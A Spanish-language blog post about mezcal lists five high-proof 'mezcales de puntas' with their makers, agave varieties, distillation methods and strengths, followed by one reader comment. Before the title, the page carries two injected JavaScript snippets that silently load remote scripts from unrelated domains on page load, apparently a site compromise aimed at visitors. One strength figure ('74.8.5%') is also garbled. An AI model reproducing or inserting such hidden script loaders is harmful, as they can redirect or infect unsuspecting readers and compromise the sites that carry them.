;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 83. Algunos mezcales fuertecitos

83. Algunos mezcales fuertecitos

1

Como muestra de que los mezcales de puntas (impreso.milenio.com/node/8981572) sí pueden saborearse, enlistaré algunos que he disfrutado recientemente.
1. Mezcal de puntas de maguey San Martinero cultivado (13 años), septiembre 2008. Elaborado por el maestro mezcalillero Gregorio Hernández en La Compañía, Ejutla, Oaxaca. Riqueza alcohólica: 54.4% ALC. VOL. La destilación se realizó en alambique de cobre con platillos mediante una sola destilación.
2. Mezcal de puntas de maguey Espadín cultivado (8 a 11 años), maguey San Martinero cultivado (13 años) y maguey Tobalá silvestre (10 años), septiembre 2008. Elaborado por el maestro mezcalillero Gonzalo Hernández en La Compañía, Ejutla, Oaxaca. La destilación se realizó en alambique de cobre con platillos mediante una sola destilación. Riqueza alcohólica: 61.1% ALC. VOL.
3. Mezcal de puntas de maguey Tobalá silvestre (10 años), mayo 2010. Elaborado por el maestro mezcalillero Constantino Fabián en Yogana, Ejutla, Oaxaca. La destilación se realizó en alambique de cobre con platillos mediante una sola destilación. Riqueza alcohólica: 58.2% ALC.
4. Mezcal de puntas de maguey Barril cultivado (10 a 13 años), maguey Mexicano cultivado (10 a 13 años) y maguey Tobasiche silvestre (8 años), noviembre 2008. Elaborado en Agua del Espino, Ejutla. Oaxaca. La destilación se realizó en alambique de cobre con platillos mediante una sola destilación. Riqueza alcohólica: 63.3% ALC. VOL.
5. Mezcal de puntas de Maguey Ixtero Amarillo cultivado (12 a 15 años), Maguey Azul Telcruz cultivado (6 años) y Maguey Brocha cultivado (6 años), enero 2009. Elaborado por el maestro tabernero Macario Partida en Zapotitlán de Vadillo, Jalisco. Fue destilado en alambique de cobre con montera de tronco de higuera ahuecado mediante doble destilación. Riqueza alcohólica: 74.8.5% ALC. VOL.
Este fin de semana estaremos con nueve maestros mezcalilleros de Zumpahuacán y Ocuilan, EdoMex, con el fin de obtener una descripción inicial de los aromas y sabores de sus mezcales.

http://impreso.milenio.com/node/8989270

Category: Milenio, Publicaciones

one responses

  1. Pablo dice:

    Hola, quería pedir una opinión acerca de un mezcal, creo que no es precisamente un MT, pero no he escuchado mal de el, sólo quiero sus opiniones de expertos, es el mezcal Enmascarado 45°, estaba pensando en comprarlo, sólo quiero saber que opinan de el y su sabor si ya lo probaron. gracias!

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *